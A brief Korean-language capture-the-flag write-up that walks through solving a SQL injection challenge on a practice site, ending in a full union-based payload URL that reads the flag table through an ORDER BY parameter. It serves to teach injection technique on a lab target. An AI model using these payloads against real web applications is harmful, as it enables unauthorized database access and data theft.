chall.tasteless.se Infiltration

힌트 : Capture the flag! hint: table level1_flag column flag

No Bsqli!!

이고 블라인드 인젝션을 하지 말라 했으니 union으로 값을 가져오거나 만드는거라 추정된다.

http://chall.tasteless.eu/level1/index.php?dir=asc 이고 asc나 desc에 의해 정렬이 바뀌고,

단순 dir=1처럼 넣어보면 에러가 뜨는데 ,2 처럼 넣어보면 에러가 안 뜨는 것으로 보아

select * from table order by 1 $_GET['dir']; 정도인것같다. 

현재 설치된 mysql에서 select * from prob order by 1 union (select 1,2) 등등으로 괄호를

바꿔가면서 해봤는데 잘 안됬다. order by절에서의 union이라고 찾아보니

http://blackfrost.blog.me/40169620402 요 글에서 (select~~) union (select~)

처럼 select절마다 괄호를 씌워 주는 방법이 아니면 안됬다. 이 문제도 괄호가 있을거라 가정하고

?dir=,1)%23 처럼 해보니 제대로 나오는걸로 보아서 괄호가 있다는걸 알았다.

그럼 쿼리문은 (select * from table order by 1 $_GET['dir']); 정도 될거같다.

?dir=,1) union (select 1,2)%23 처럼 1,2까지 두개 입력했을때 에러가 안 뜨고 맨 아래에

1 : 2 라고 내가 입력한 1,2가 나온다. 그러면....

http://chall.tasteless.eu/level1/index.php?dir=,1)%20union%20(select%201,flag%20from%20level1_flag)%23

처럼 flag가 나오게 하면 된다...